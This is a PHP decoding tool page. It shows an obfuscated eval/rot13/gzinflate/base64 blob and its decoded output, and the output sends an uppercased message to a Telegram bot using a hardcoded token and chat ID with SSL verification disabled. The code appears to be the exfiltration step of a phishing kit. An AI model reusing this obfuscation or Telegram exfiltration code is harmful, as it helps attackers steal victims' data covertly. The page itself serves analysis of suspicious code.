Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(str_rot13(gzinflate(base64_decode('jZFra8IwFIa/D/YfQhGiUGyzm5fRgdZexpybFR1OpLSlOTJH..
Decoded Output download
if ($settings['telegram'] == "1"){
$data = strtoupper($message);
$send = ['chat_id'=>$settings['908027811'],'text'=>$data];
$website = "https://api.telegram.org/bot901913677:AAEH4P_BnHID027mmgZXYQQUiU015JyUmSU";
$ch = curl_init($website . '/sendMessage');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ($send));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
}
Did this file decode correctly?
Original Code
eval(str_rot13(gzinflate(base64_decode('jZFra8IwFIa/D/YfQhGiUGyzm5fRgdZexpybFR1OpLSlOTJHbGMbaMf++1JLh9+2r8nzPuc9HHFE7RblACLI6AYDL3gWsxJvkWEghSidr8sLhFopA4YMRCGGcBdFPG63Sk4py3jn/gRQHqQS2OAkZ+CLFBsPZ9qB3teven1C8FaVM/ZQfVfObZ3+4AcqgEuBkgNEdKhpLBLdpk03jDPtEMJAJwNyfdfrDWczb3lj+i/BcjWX5rLMnp+mk4krXJ3cvn26pe0qtTrJpTXZxYUvAgHt31FdhLWq9Hu9Bq73OIGydxhJNMlV9Opa67Hp+JbnuNbIsWYje+FZKiJ/8ObYdv5HLVbeem6rpzMEaeePhG2v/UfPWi2mplf1OLKCNjeIOd0V0KzL9zypsmfCpAgpb96+fwA='))));
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | 7ea03717255c32db492c41e86e0c628e |
Eval Count | 1 |
Decode Time | 42 ms |